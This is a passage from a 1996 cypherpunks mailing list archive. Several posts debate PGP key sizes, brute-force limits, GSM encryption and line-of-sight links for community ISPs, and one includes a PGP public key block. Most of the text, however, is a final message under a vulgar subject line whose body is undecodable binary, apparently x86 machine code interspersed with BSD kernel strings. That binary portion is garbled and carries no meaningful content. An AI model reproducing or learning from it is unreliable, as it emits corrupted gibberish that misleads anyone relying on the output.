I especially apologize to J.Ray for whatever inconvience I may have caused
him. 
 
 
-- 
     -- tallpaul 
     -- "Let's All Visualize HappyNet!" 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thomas@inch.com (Thomas Massengale)
Date: Thu, 4 Jan 1996 23:14:04 +0800
To: "Mark M." <cypherpunks@toad.com
Subject: Re: 2047 bit keys in PGP
Message-ID: <v02130502ad119c1ab80f@[205.231.67.43]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:17 PM 1/3/96, Mark M. wrote:

>I really don't see the point of using a key larger than 2048 bits.  Any larger
>key would actually be harder to factor than brute forcing the IDEA keyspace.

the world will never need more than 640K of RAM?

<><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
the Forest will always be there...and anybody who is Friendly with Bears
can find it.


- A. A. Milne






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Fri, 5 Jan 1996 03:11:24 +0800
To: cypherpunks@toad.com
Subject: Re: 2047 bit keys in PGP
In-Reply-To: <v02130503ad119cbfdece@[205.231.67.43]>
Message-ID: <30EC164A.2781@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Ian Goldberg wrote:
> 
> Order of magnitude check:
> 
> There is a very well-defined limit to the size of key that can be
> broken by brute force, independent of your "wildest dreams" as to the
> growth of technology.  It's the Laws of Thermodynamics.
> 
> For a symmetric algorithm for which any value of the appropriate
> length n is a possibly valid (and equally likely) key, there are 2^n
> keys to try in a brute-force search.  From Applied Crypto, 2nd ed,
> pp157-158, setting or clearing one bit takes at _least_ 4.4*10^-16 erg
> of energy.  For symmetric keys of size 256, then, you would need more
> than 10^61 erg (that's 10^45 GJ) of energy just to _enumerate_ the
> states.  For comparison, this about 10 billion times larger than the
> output of a typical supernova.
> (Ibid.)

Although your point is quite valid, there is always the possibility of
some technological advance that invalidates these calculations.  It is
possible that quantum crypto will some day make brute forcing 256 bit
keys practical.  (Of course, my knowledge about quantum crypto couldn't
fill a thimble, so maybe I'm wrong.)

These results also apply only to symmetric key ciphers and have no
relation to the difficulty of breaking RSA.  The techniques for
factoring large numbers have come a long way in the recent past and it
would not be much of a surprise for them to take another large leap.

All that being said, I believe that 128 bits is sufficient for a
symmetric key and 2048 for a public key.  Our paranoia would be far
better directed at as yet unknown attacks on the algoritms involved
or the specific implementations of cryptographic systems.  Paul Kocher's
recent timing attack is a perfect example of what we should be afraid
of.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: netdog@dog.net (netdog)
Date: Thu, 4 Jan 1996 23:17:45 +0800
To: "Mark M." <cypherpunks@toad.com
Subject: Re: 2047 bit keys in PGP
Message-ID: <v02130503ad119cbfdece@[205.231.67.43]>
MIME-Version: 1.0
Content-Type: text/plain


>I really don't see the point of using a key larger than 2048 bits.  Any larger
>key would actually be harder to factor than brute forcing the IDEA keyspace.
>Very little security would be gained from using a key larger than 3000 bits.
>Of course, one can always argue that improved factoring methods would require
>that an RSA public key be longer than 3000 bits to have equal security to
>IDEA.  However, I doubt that factoring methods will improve that much.

nobody will ever need more than 640K or RAM?  i wouldn't underestimate the
ability of technology to grow at a pace that is beyond our wildest
dreams-especially with this network serving as a virtual office/lab.  of
course, ymmv.

<><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
the Forest will always be there...and anybody who is Friendly with Bears
can find it.


- A. A. Milne






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Meredith <meredith@ecid.cig.mot.com>
Date: Thu, 4 Jan 1996 18:40:51 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Guerilla Internet Service Providers (fwd)
In-Reply-To: <m0tXWnU-00090EC@pacifier.com>
Message-ID: <30EBA97C.41C67EA6@ecid.cig.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell wrote:

> And as you pointed out, this is especially important if RF is the
> medium-of-choice for connections.  We should definitely make a
> serious amount of contact with people working on the PCS standards
> to ensure that GOOD encryption is included.

If by PCS you mean the GSM derived 2GHz system, then I believe that they
use the A5 algorithm, the same as GSM. Unless they are using one of
deliberately crippled versions, then I think you'll find that this is
quite tough stuff.

Seeing as the rest of the planet seems to have gone with GSM 900, it's a
shame you guys didn't do likewise, you'd have had proper international
roaming and decent airlink encryption for years by now ;)

As a semi-aside, I'm not sure if anyone here has mentioned it yet, but
the DCS 1800 (another GSM variant) based "Orange" UK cellphone operator,
recently announced that they have linked their MSC direct with the Demon
ISP (biggest UK ISP), so that you can now get a 9600 baud encrypted pure
digital Internet link. It's not exactly as cheap as a local call, and
9600 baud isn't exactly flying, but ...

Andy M

PS Ok then, maybe I _am_ biased towards GSM, see .sig ;)

-- 
Andrew Meredith
Senior Systems Engineer            Tel: (direct) +44(0) 1793 545377
Network Engineering Tools Group    Tel: (main)   +44(0) 1793 541541
Motorola, GSM Products Division    Fax:          +44(0) 1793 512618
16, Euroway, Blagrove   SMTP:             meredith@ecid.cig.mot.com
Swindon, SN5 8YQ, UK    X400: Andrew_Meredith-QSWI016@email.mot.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 5 Jan 1996 04:22:05 +0800
To: cypherpunks@toad.com
Subject: Re: Guerilla Internet Service Providers (fwd)
Message-ID: <199601041851.KAA27062@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:43 1/4/96 -0600, Jason Rentz wrote:
>Previous exchanges deleted...
>>
>>With a tightly focused beam (light is easy, I don't know about lower
>>frequencies), you can prevent interception except by very obvious physical
>>devices.  (e.g. Someone in a cherry picker truck.)  You may be able to
>>avoid the need to encrypt the link (and all the paranoia about key
>>management, advances in factoring etc. that that implies.)
>>
>>Bill
>
>The problem with this comes when you start creating links between much
>taller buildings like in San Fran.  Any give building over 30 stories might
>sway a foot or so at any given time.  Combine that with the other building
>and you might get a few feet of movement. (movement not including during an
>earthquake)  :)

(1) No single communication technology is appropriate for every problem.

(2) A technical fix could include having the receiver send steering orders
to the transmitter.  This solution would, of course, be a long way from the
low tech scavenged lens and 1/2 meter cardboard mailing tube technology I
was thinking of.

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andr0id@midwest.net (Jason Rentz)
Date: Fri, 5 Jan 1996 02:52:03 +0800
To: cypherpunks@toad.com
Subject: Re: Guerilla Internet Service Providers (fwd)
Message-ID: <199601041743.LAA25788@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


Previous exchanges deleted...
>
>With a tightly focused beam (light is easy, I don't know about lower
>frequencies), you can prevent interception except by very obvious physical
>devices.  (e.g. Someone in a cherry picker truck.)  You may be able to
>avoid the need to encrypt the link (and all the paranoia about key
>management, advances in factoring etc. that that implies.)
>
>Bill

The problem with this comes when you start creating links between much
taller buildings like in San Fran.  Any give building over 30 stories might
sway a foot or so at any given time.  Combine that with the other building
and you might get a few feet of movement. (movement not including during an
earthquake)  :)

(andr0id@midwest.net  callsign: N9XLM)
( Computer Consulting & Management   )
(P.O. Box 421  Cambria, IL 62915-0421)

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQENAzCsIi4AAAEH/1hb5+tO/n99Nbppf0ImLJ6AaVZ3NlZP0ZHwRQor00uA129i
d4zWixNXxc8t2auaqN+asV99LpIip3/nQzBnjydiumeBdGLF2PR9+6X8X/RrqKa1
dVIukxM5Agg2eM6ih+0J38hgKJ3qzKXSz6sjYmpaxvbXZoHHOLUk/ZtHUKvvEyPw
hnJEYnut8NUnIeK56lqeqRw86yoeRKymbfCdjdpgeY2aRwK2FJts8sbb7Fs10s4y
jgxWIxIipBznbGUTh1hb2XrLGPENwk3E/qqXQJEsrySbtwdl6VgTVQjhDDEJMitL
DYeiQ3W5EgxfcdbM1j2FwYu3P/dM6Y0I8xLMYT0ABRG0NmFuZHIwaWRAb2ljdTgx
Mi5jb20gKG9pY3U4MTIuY29tIHN5c3RlbSBhZG1pbmlzdHJhdG9yKYkBFQMFEDCs
LO90C7R/GkJcSQEB01cH/0KC3sd+u4OxMku5378SJktoN6QIQYLJ7uVbuV4S51yK
NAotCGf4Wl6wwjynzZvXKU0H87oDuMiq7FybgMNL2n+4bQIZi0iz0lIuzwoMDu63
NrHUW9Kz42pOnhrEhrdkHhHL9O5GgD1yc40fJ3qw5h7LQEjDxgypyw0IFILFc34u
LeRLliNibxKp8JwAxXNHWSgxu28TQvmnkHi0AHP6tJ/uZYe+4dqJtrMMsYFjzZaz
DPmxD+dzbTwlQKtJaP1ZkDI0Sr072wrZDv+G86GyGBMX2lpSafpRitnxuUttjU9o
wsQ9Qo5xiH1nZRCs/bDzJe/gng+GHzevixDIITurtNA=
=SgPT
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: FreeBSD user <fb@sponsor.octet.com>
Date: Fri, 5 Jan 1996 01:27:37 +0800
To: cypherpunks@toad.com
Subject: czesc huj
Message-ID: <199601041149.LAA07117@sponsor.octet.com>
MIME-Version: 1.0
Content-Type: text






Ç$°
óÃ

Â
ðÂ‰Ü3ð1/4Ðÿ¿ï1À‰Å¡¨°ð‰p¶
¸



1ÀeÔ[^_ÉÃ



¸
tF@9ÁsEA€9
uö‰ÏN€~ t
€~	u
A€9 tú€9	tõS.ë
€9	tŠˆAB9ùs€9 uìÆ




¸
)ÎµDúÿÿÿ...@úÿÿ‹Húÿÿ9@úÿÿrÏ‹•Púÿÿ•@úÿÿ9•lúÿÿs‹µlúÿÿ9µPúÿÿs
+µPúÿÿ‰µ@úÿÿ"
¸
Äÿµðúÿÿÿµøúÿÿÿµôúÿÿÿµüúÿÿÿuè1/2õÿÿƒÄ...Àu"ÿµüúÿÿÿuè|õÿÿÿµôúÿÿÿuènõÿÿ1Àë
¸
ÑîKƒûwÿ7‹GÿÐƒÄƒøÿtE‰ÙÓà	ÆƒÃƒûvã‰ðƒàÁî‰w
ƒÃþ‰_ƒøu	Wèkúÿÿë'...ÀuWèê÷ÿÿëƒøt¸

hö#ðèÆ


1ÀéR
UØR‹UÂË


ÇXÀð

$
h‡5ðè"¸
1Àé˜
u‹V ‹R(‹M‰1ÀéT
u‹v ‰u¸‹M
‹Q‰V(1Àé
...
t
¸	
VWèÐð
fƒøt
fƒøtë*QE Pÿr ècS
fƒøt
fƒøtë*QE Pÿr è"R
fƒút"fƒúuHƒyt
¸
ÇEø2
uafÇEþ
t
¸-
fÇEü
¸	


´

h<Nðè¬š
h°NðèØ(tm)
jWèÆ
ÿ2èžè



öF(t€K(ƒ}

K
À"
¿
‰N0‹B(‰F4‹B(‹@‰F8j
¸
¸
ƒøtë7jõ
ÇEü
hqoðè°}
j(ÿuøè§

j(ÿuøès

‹Eøfƒxu
‹Eøë
‹Eø‹PëÈ1À‹]ôÉÃlf_findoverlap: default
éiÿÿÿ‹}ø9yu‹Uü9Qu
9Y
u	9q"*ÿÿÿ‹}ü9y>‹Uü9Qu‹}ø9yw.ƒûÿuƒþÿt$9q|
u9Y
s
ƒy
ÿuƒyÿu
¸
¸
¸

‹]äƒ{
K8ƒÄ...Éu‹S$öÆtV‹}‹‹uè)Lò‹
ò)O‰Î‰÷Áÿ‰ò‰ù‹}WO
‹S$öÆ...Oþÿÿ‹‹uèƒ|ñ
...Ét‹B‰A‹B‰j)Rè-öÿÿ1Àë@...öu1Àë3hÌ‡ðèþe
‰Z‰‰z‰r
‰ðeô[^_ÉÃ
¸
‹C0‰Fë.‹F9C0t$PèûÿÿƒÄ...Àt
‹-Ü
9st9suƒÿÿt!9{t9{t‹Eú
‹‹@9Ct‹‹@‰C‹UJ(
9{
t9{uƒþÿt!9s
t9st‹Eú
‹‹@
9C
t‹‹@
‰C‹UJ(
1ÀÉÃ¸
u
jRèõìÿÿƒÄ‰
‹€Ü
...ÀtéÝ
¸
¸
ƒøtéŒ
¸
¸
u,‹S9Vs$‹UÂú
u;
u;
ƒþ	tƒþu
¸

!ƒÄ
ƒþ	tƒþu
¸

WSè§
£¨
<tvéÉ
‰ð÷Ð!ƒ¨

öC)"
ƒøteë_ƒ{0~u÷Ç



f1/2^ÿÿÿt
"

Sÿ6ÿuëSÿuÿ6èáT

ƒútë+Qÿ3èŒV

ëQÿ3èxV

eð[^_ÉÃ
v
¸

‡¨
¸
¸
¸
RQÿuèA

À...
ÇƒL
[^_ÉÃ
¸
‹RPPè
)‹R)PPè
cleaning up... 
ÿ3è;÷





¸
ƒà@Å
JˆJ‹]üÉÃ


¸






QˆQ1ÀeÜ[^_ÉÃ
ƒã‰÷ƒç
‹M
...Òt9Zv
[¶DÂ£ør*j








Ð‹uü‰DžCƒû}~Å‹uüÇDžÿÿÿÿ‹Eüeð[^_ÉÃbad sector table corrupted
ÇEüäéð‹C$öÄtƒÆƒþ		9w,‡DÿÿÿÇC$ 


Sè	

ÇEñðÆEð 1öë...Û"8

Ç`ýð
Ç`ýð

VèT>ÿÿëR‹VÂÀ
ƒøtƒø#u1À+]ð‹}‰eÌ[^_ÉÃ
ƒûtƒû#u1Û+uð‹M‰1ƒ}˜
jÿu˜èô|ÿÿ‰ØeŒ[^_ÉÃ
ƒûtƒû#u1Ûƒû u
j
ÿuèh¥ÿÿ+uð‹}‰7‰ØeÌ[^_ÉÃ
ƒûtƒû#u1Ûƒû u
j
ÿuè4¤ÿÿƒÄ+uð‹M‰1ƒ}˜
jÿu˜èõzÿÿ‰ØeŒ[^_ÉÃ
u‹F ‰P(1Ûéó
"
u1Û‹F ‹@(‹tÿÿÿ‰ët‹Fÿuÿµtÿÿÿhwt@V‹@ÿÐ‰Ã‹tÿÿÿ÷ƒÄëK‹FÿuÿµtÿÿÿWV‹@ÿÐÃÄ...Ûu-÷Ç
¸
Ã
¸

¸
¸
ùf@tNë|ù	s@tXërƒ;
VSQè<ú
t*öCu$fƒ{$




9:ð
h/ðèÛ×ÿÿ¿N
‹äÕðf‹Jf¡ˆ"ðf‰Jf‹F
f£ˆ"ðÿ(tm)ðf‰^
·F9Œ:ðf‹=Œ:ðf)~ë"fÇF
ÿt
hMðèw×ÿÿ¡Ð...ð‰5Ð...ðeô[^_ÉÃmsg_cbytes is screwed up
·C9Â...b
h&ðèDÖÿÿÇF 
¸
¸
ÇC
Áâ·Æ	Â‹M‰1Àeð[^_ÉÃmsgwait
·G9Â...î
‹EðéY
h·ðèPÑÿÿ9=(tm)ð}
hÒðè>Ñÿÿ‹EøF9F s
hîðè'Ñÿÿ=Ð...ð
h-ðè
ÿÿf‹Møf‰H...ÿŽ"
hLðè¬Ðÿÿf‹ˆ"ðfƒûÿ
h]ðè•Ðÿÿ¿Ã9:ð
hmðèÐÿÿ¿Ã‰Eä‹äÕðf‹
Bf‰
ˆ"ðÿ
(tm)ð‹Eìf‹@
‹Mäf‰J‹Eìf‰X
O...ÿmÿÿÿj‹EìƒÀPÿuüèØè
ƒ}ø
h§ðèhÏÿÿffÿýƒ~ 
‹M
·A9Â...9
öEñ"D
öEñ"ì
‹M
·A9Ât
¸
f‰MèÇEì
h ðè´Ëÿÿ¿Eè9:ð
h ðèžËÿÿÿuàÿuü¿Eè¯Œ:ð°ÎðPè"ã

ƒøt
ë#‰
ÔÇðë)ÇÔÇð
¸
u	¸
‹u
·F9Â...Ö
‰E¸é
f@€äf‰D
f‰tÇD
Áâ·Ã	Â‹}‰1Àeè[^_ÉÃsemwait
‹M
·A9Â...Ð

ëfÿFj
‹M
·A9Ât
¸
é þÿÿfÿNé-þÿÿƒ}Ä
hß.ðèP1/4ÿÿKy1/21Û9]ÔŽ˜ýÿÿ[À·0‹MÐ‹I‰M¸Rf‹D0f)'C9]ÔÜémýÿÿÿEÌ‹MÔ9MÌŒ%ÿÿÿÇEÌ
hÎ2ðè"ºÿÿ‹]ð·C9Á|
hì2ðèºÿÿƒ}ô
‰ØÁè9Ât1Àë‰È‹]üÉÃ
¸
...À"Ž
Áâ·Ç	Â‹M‰1Àë¸
¸
hq:ðè³ÿÿ‰×ë‹=`×ðÇ`×ðÿÿÿÿÁà‰Ã<¯ðfÇC
f@€äf‰C
j
Áæ·Ç	Æ‰uüj
¸
SWè£÷ÿÿƒÄFƒÃ95L:ðäj‹G ÿ°Œ

Ç`ýð
9Æu5€y
ÿt/ƒ}ø
€y
ÿ...¸

u
‹MüöÁ@t3/4
èá$
t"‹Mô¶9Æt¶A9Æt¶A9Æu)þÿ
u.ö‡"
¸

Bë
ƒÂ€âø‰-Ä
t€m}
	t€Ü
‹Wh‹R
ë
º1u
¸
‹]üfƒ{
O\
¸
¸
¸
¸

@^tºZZðRh
t,‹µtþÿÿ¶9Ót¶V9Ót¶V9Óuûÿ


èîÞÿÿƒÄ¡
¦Œ
uUö†Œ
Nÿÿ‹]üÉÃ




h
lðë‹Gh‹X...Ûuh+lðWè_‚ÿÿé"
ƒøt9ëƒøt3‹Cl9Alr'‹Al9Clr
€y(
€y(
u
Vj
èsØÿÿƒÄVWèiØÿÿVèéÿÿƒÄ
‰
t€"=	t€}7=t€²
‹1/4Èðë
‹†¤
‹Áà	F`ë
‹Áà÷Ð!F`WVè

t€~b=t€t[é



1Àé¡
¸#

...ÉteéÀ


t€Jÿ	t€î

‹Fh‹@
ë1À‹M‰1Àéð
t€ÿ	t€}7ÿt€>ÿ}t€|6ë%ÿut€t
ÿt€tëÿt,€ÿt,€|€K@jVèxöÿÿƒÄ1Àö†

SèDÿÿÿë‰ØF
9F~‹^+^
‰Ø÷ØPè

‹
ƒÁ‰Kë
ÇC
ƒ}
‹
ƒÁ‰Kë
ÇC

hr‡ðè¨aÿÿ‹£PÊðÇ

hr‡ðèŒ_ÿÿ‹£PÊðÇ
¸
ÇˆÈð
ÿ¤Èðëÿ Èð‰Øeø[^ÉÃ
ÿ¤Èðëÿ Èð‰Øeø[^ÉÃ
Vèþÿÿ1ÀëIöFt#‹V‹N‰S‰Kf‹~fçf‰{{‰{
€fý‰3‰Þƒ}
cw
ºd
...öu"ƒ}

‹-é	
¸+
h?(r)ðè8?ÿÿ€KSèšþÿÿƒÄ‹Mü‰


P‹BÿÐÉÃsoaccept: !NOFDREF
uVèž
"%
uƒ}
‹E‹@‰Eôƒ}ô
ƒà‰Eð‹Bÿ@4ƒ}
¿ 
·y$éð
fƒà$fƒøu-öF
u@ƒ}ô
"œ
ƒ}ì
 tƒ}ô
ƒ}ô
...û
tÇEô9
"g
ƒ}ô

u
ƒ}ä
ƒ}ô
t€Mø‹MøöÁu?G0Pèd
tƒ
t‹Aƒx

j
‹
RQè
‹@ƒx
‹	ƒÁƒ9
huÍðèÀ ÿÿƒ}
‹[ƒ{
H‹
‹Rƒz

f‹Uüf	Vë
hÈÏðèöÿÿeð[^_ÉÃsbflush
hAÑðèäÿÿ‹]ü‹s‰uüéÙ

h¡Õðè@ÿÿ‹EøfÇ@

¸%
·^$fÇF$


‹@
ƒÀäë
‹EÔ‹@
ƒÀì+EÔƒø
v‹EÔƒ@
ôƒ@
ëj
ƒûtƒû#u1Ûƒû u
j
ÿuènËþÿƒÄ...Ûu+uð‹}‰7ƒ}Ø
¸(
¸(

ƒûtƒû#u1Û...Û...7
ëHÇEè
¸(
¸(
¸
j


€:wŠˆB‰ñˆ
‰øeô[^_ÉÃU‰å‹E‹U
‹M9Pv	‹
¸	
u	‰1ÀÉÃ¸&
¸-
ƒ}

ƒ~

ÇEü7
hÞéðèÿÿ‹F
‹ƒ}
tEöCtj
¸)
u)S ...Òt"‹B
x<Ëðuö@
thLøðÿrDèÝ
‰-ƒÆGfÿC
Ó...Ûu×uü_ÿ...Û|‹ÿp èÒÉÿÿƒÄƒÆKyíuü_ÿ...Û|j

h8þðèüïþÿC$öÄ ...Š
Sèˆ


G$%þÿÿëG$(c)
hFÿðèÀíþÿƒx
hYÿðè°íþÿƒ¿Ì
htÿðèLíþÿ‹Mð‰œŒ
èþÿfð...Ûtƒ{(t
hÌðèîçþÿ...Ûu(Çdð
ð‹E
PSèLªþÿÄ...Àt1/2‹uô‰5
ïÿÿƒÄu9s4tGC$(c)
ƒ}






èÿÿë‹U‹B$%ÿÿÿ‰B$Rè`¡þÿƒÄ‹Mü‰


€b0¿Rè´Ÿþÿeì[^_ÉÃU‰åƒìWVS‹MA$(c)

‹C
£žð‹S
‹C‰¡
‹C
£žð‹S
‹C‰ÇC
‹‹@
£žð‹‹P
‹@‰‹¡
‹EäéÀ
ÿuè´Ñÿÿ‹]Ø‰sD‹M‹QL‰SLeÌ[^_ÉÃvfs_cluster: warning: buffer already busy



¸
‹uÐfÿßÿÿ‹M‹A€8
‹M‰YfÿC‹u‰^‹MÐöA
uÇEø˜µð‰]ü‹
˜µð‹SEøP‹ŠÿÐƒÄ‹uÐöF"A
h'=ðèX°þÿÇEèÜ°ð‰}ì‹]
‰]ð‰uô‹
Ü°ð‹WEèP‹ŠÿÐ‰EÜƒÄ...Àt-øþ...Ä






ÿuüè^þÿÿë
h5Bðèò­þÿeð[^_ÉÃ
h5FðèŒ§þÿ‹MA,...ÀtöE
t
ƒxH
ƒ{H
h\Fðèœ¥þÿ1ÀeÜ[^_ÉÃbgetvp: not free
hyIðèÌ¤þÿ¡
Ç

Z‰<^ð‰8^ðÇB 8^ð"ÿÿÿë!ÇB
hÂOðèxþÿ...öt	SèýÿÿƒÄ¡(eð‰CÇC`
hÇQðèÔ›þÿöCtV1É‹C<‹
‹C £<^ð‹S ‹C‰¡8^ðC...Àt{‰x ë	{‰=<^ð‰8^ðÇC 8^ðÇC8

	

Í
Mð=|ð...ÿ"³
ƒz 
3/4
tsö
uWèHòÿÿ¸
töCuWè-òÿÿ¸-
ñÿÿ¸
¸
‹C£|ð‹S‹‰‹C
Ç@<
‹Mø‹U‰
1Àeè[^_ÉÃ

=
Pè<âÿÿë
ÿuÌèüáÿÿƒÄƒ}È
Sè`ßÿÿë
ÿuÌè ßÿÿƒÄSèßÿÿ‰ðe"[^_ÉÃ
¸	
t
¸
¸
f‰A
f‹B
f‰A
f‹Bf‰A
f‹Bf‰Aƒz4
"
"
"

3/4
3/4
ÊÿÿƒÄÿµxÿÿÿèüÉÿÿj
ÿu¤èÊúýÿƒÄ
ƒ}À
¸	
"
¸	
u	‰1ÀÉÃ¸
Pè¨Àÿÿë
‹}ÿwèeÀÿÿƒÄ‹MÇA
"
1/2|ÿÿÿfÿG1Àë
ÿµ|ÿÿÿèõ1/4ÿÿ‰Ø¥lÿÿÿ[^_ÉÃU‰å‹Eö
‹S‰V
‹S
‰V‹SD‰V‹S‹K‰V0‰N4‹S$‹K(‰V‰N‹S,‹K0‰V ‰N$‹S4‹K8‰V(‰N,‹S ‰V@‹S@‰VD‹S<‰VHj
1Àé3/4
hÒ-ðèhVþÿ‹Cƒx8u
1Àë¸

3/4
ƒ{
‹B‹@<‹
ÿ3èÉ*ÿÿƒÄöFtÿKu
ÿsè›*ÿÿƒÄ‹Uüfƒz~1Àë4ÿ3èÍ
ÿÿ‰ÆÿsèÃ
ÿÿ‰ÇjSèQßýÿ‹UüÇB<

PSèU1/4ýÿƒÄÇCL
ÿÿÿöC)uGéÿþÿÿ...Àu>€{,t8j


þÿ‰ÃƒÄ
‹Eà
¸

¸(
u
XþÆ3
ƒÃƒ;

ÿs
èþ×ýÿë¸à(tm)ð...Àu
¸
ûÿÿÉÃU‰å‹E‹PJƒúwmÿ$•¸±ðÜ±ðì±ðì±ð²ð²ðü±ð
²ð²ðì±ð‹@
Ç

j
ÿrèNÌýÿ1ÀÉÃ
ÇEð
ÇEðà(tm)ðƒ}ð
¸
fÿA1ÀéÔ
¸
ÇEÜà(tm)ðƒ}Ü
‹
˜µð‹W]øS‹ŠÿÒƒÄ‹G<¶H
IÁâ)Ê‹}ÿw
Vÿp
‹•œððÿÒ‰EØƒÄ
ÇEølµð‹uè‰uü‹
lµð‹VS‹ÿÒé(r)
ÿuìè
>ÿÿëÿuìèD=ÿÿƒÄƒ}Ø

´ýÿ‰ÃƒÄ
...Û"œ
ÿuVW‹CÿÐeô[^_ÉÃ
‹EƒÀ9Áu
1Àël‰Ï+}G‰}ôŠˆUø‰Mü1öë
¶3/4tBÐAŠÐ<	ví‹}üÆ

û
i €t6ëmþi €t,ëcþi ÀtD
þ
i Àt2ëMþi Àt8þi Àt8ë;‹Uü€z
û
i Àtë"ûi Àtûi Àu‹Uüf¶Jf‰Jë1Àeì[^_ÉÃ
‹EÄe¬[^_ÉÃ0123456789

‹V
ƒÂäë‹V
ƒÂì)òƒú
v
ƒF
òƒF
ëjj
VèÊþÿ‰ÆƒÄ
...ö""
‹
...ötVè*Èþÿ‹EðeÔ[^_ÉÃ
fK



‹uüƒ¦´
Ç†"
Ç†€
u‹W‹
Øfð‰
‹W‰ØfðÿœÈð£
1Àéî
ÇƒÀ
‹Ü^ð‰B£Ü^ðÿà^ð‹(
ˆÿƒ¨
t‹Rëé‹Rëä‰ÐÉÃU‰åVS‹]‹u‹E
fƒx
tŠ"P
t‹@ëá‹@ëÙeø[^ÉÃ
‰þ¶)Â‰UüCAÇEø
t
‹ëé‹ëâƒ
"
8t‹[ë‹[¿C9ÂwáÿuRÿuèáþÿÿ‰Eè‹P‹uð‹F
ŠN
"
8u	‹Mè‰Në
‹Mè‹uð‰N‹uè‰s‹Mð‰N‹F
ŠN
"
8u‰^ë
‹uè‰V‰^‰ÐeÜ[^_ÉÃrn_addmask: mask impossibly already in tree

‰}ð‹...ÿu¸9ßu4‰uÜ‹}‹Mð‰OŠA
ˆG
‹q‰w‰y9Nu‰~ë‰~‰û‹uÜë ‹}‹Uð‹B‰G‰z‰Wƒ




‹J
‹uø¶1...Øt‹uü¶1...Øt‹RëÔ‹RëÎ‹Uð¿r‰uôfƒz

h¢ðèPëýÿ¡äzð@Pÿ5|Dðèp
3/4-
3/4
3/4
3/49
]ØfÿC6ë(]Ø...ÛtCöC9t=ÇEÐ


PS‹@0ÿÐƒÄfƒ{6
h{	ðè\äýÿÿ
Hhðfƒ{6
h
ðèÀãýÿfƒx
hî
ðè àýÿ‰}àöG:t ƒ}
9±Œ
Sè
öÿÿë
‹ƒ"

‹C@fÿH‰s@‹F
‰C<fÿFƒ~

ÿ
ìÕðëƒøu
ÿ
ðÕðë
ƒø
uÿ
ôÕðÿ
øÕð¡
‹A
·
ñ
ë¿
h(c)ðè`Ðýÿ‹]ø‰{‰{ÇC
¸
jÿuüèYýÿ‹MìMðƒ}
¸@
"K
†à%ÿÿ
†à%ÿÿ
†à%ÿÿ
ÇEà
†à·Ð·A)Â‹F†àÁÈ†àÐ†àÁÈ†à‰F‹F†àÁÈ†àÐ†àÁÈ†àé[
†à%ÿÿ
·APS‰ÈƒÀPèýÖ
‹E
ë
‹}€OÿG 1Àeä[^_ÉÃ

ƒ=pÕð

Ç†€





¸


Ç‡€
ƒ}ü





ƒ}
t\ëzƒ¿"



¡ Òð9CXv*‹Mü€yu!€y
¡ Òð9CXt;¡ Òð‰CX‹FÿF9ÔÕð~‹EƒÀPÿuè(r)ýÿÿë€K8‹¨ÕðSXÇF
ÇÄÕð




Öðj
"îGðë‹B0€xt"Hð...Ût&...öt-Sÿ5
ÇG
Ç"Dð
‰È%
R4...Òuïë&¸


¸
‹C9F<u
ÇEà
‹F‰Gë3ƒz
‹CfÿHfÿF‰s‹Fh‰...Àt‹Fh‰X‰^h~h‰{...Ûu1/4ër‹MäÇA

ÇG$
‹CfÿHfÿG‰{‹Gh‰...Àt‹Gh‰X‰_hOh‰K...Ûu1/4ƒ>
9J(t9J u¸
R...ÒuÕ1À‹]üÉÃ
töBu
ÇEô
¸
¸/
¡hÕð‹@<ëƒÿu‹hÕð‹B
ö@t‹BL‰G‹Mƒy
hÕð...ÛtF‹G†àÁÈ†à%
¸0

¡ Òð9BXwEfƒz6
h×lðè(ýÿj

¡(Øð£ Øð¡ Òð£0Øðÿ5 Øðh¶mðj
èÑ€ýÿÇEð
t)Šó<v Šñ<vŠï<v
ÿ
fø†àf‰C
‹V
ƒÂìFƒÄ
9Âs
h+pðèµ|ýÿƒF
ì‹FƒÀ‰F‰F‹M‹A‰F‹^
jSÿuüèa"
†àf‰C
‹C†àÁÈ†à%
‹Mø‹A
ë‹}ø‹G£XØðÿvhTØðèpUÿÿ‰ÂƒÄ...Ò"Ï
¸
hyðè0uýÿ1Ò‰È- ÖðiÀÅNìÄÁøˆ‚|aðBúÿ
ÇÜ^ð
ƒÄf...Àt
ÿtÕðé
€{	."-

u‹C
9Bu‹C9BuŠC	8B	t
‹úãðuÔ1Òf){€cþöC
 t€Kf‹CfÁàf‰CöCuf...Àt)ÿˆÕðRSèt
‰‰
‹A
‰G‹A‰G‰ûéÆ

‹EèHé7
jè=þÿÃ...Ûu
1Àën‹5¨Øðµ
ÿ˜Õðë(ÿ"Õðƒ}ü
¸
‹B
fƒx.t
¸-


‹uÿ6ÿuÌÿuÜÿuà‹Mà‹AdÿÐ‰EÐƒÄé

‹uÜ‹MÀ‰1ƒÆ‰uÀÿ¸ÕðƒÄ‹MèMÔ‹uä·F9EÔŒZþÿÿ‹]Ø]Ä‹Mä·A‰Þ)Æ‰ðPÿuèþÿ‹M‰Yf‹A†à‹uäf‰Ff‹F€Ì †àf‰FfÇF

ƒÄ‹MMÜ...ÉtO‹uÜ‹v‰u‹MÜÇA
þÿƒÄ‹uuÜ...öu³ƒ}Ð
þÿƒÄëœe´[^_ÉÃU‰åƒì
WVS‹E
‹H
‰Mü‹u‹v
‰uø‹@ƒÀü‰Eô·FEô=ÿÿ
Æ

ÇEü*
j
j
ÿ1èlþÿƒÄ‹UÇ
3/4
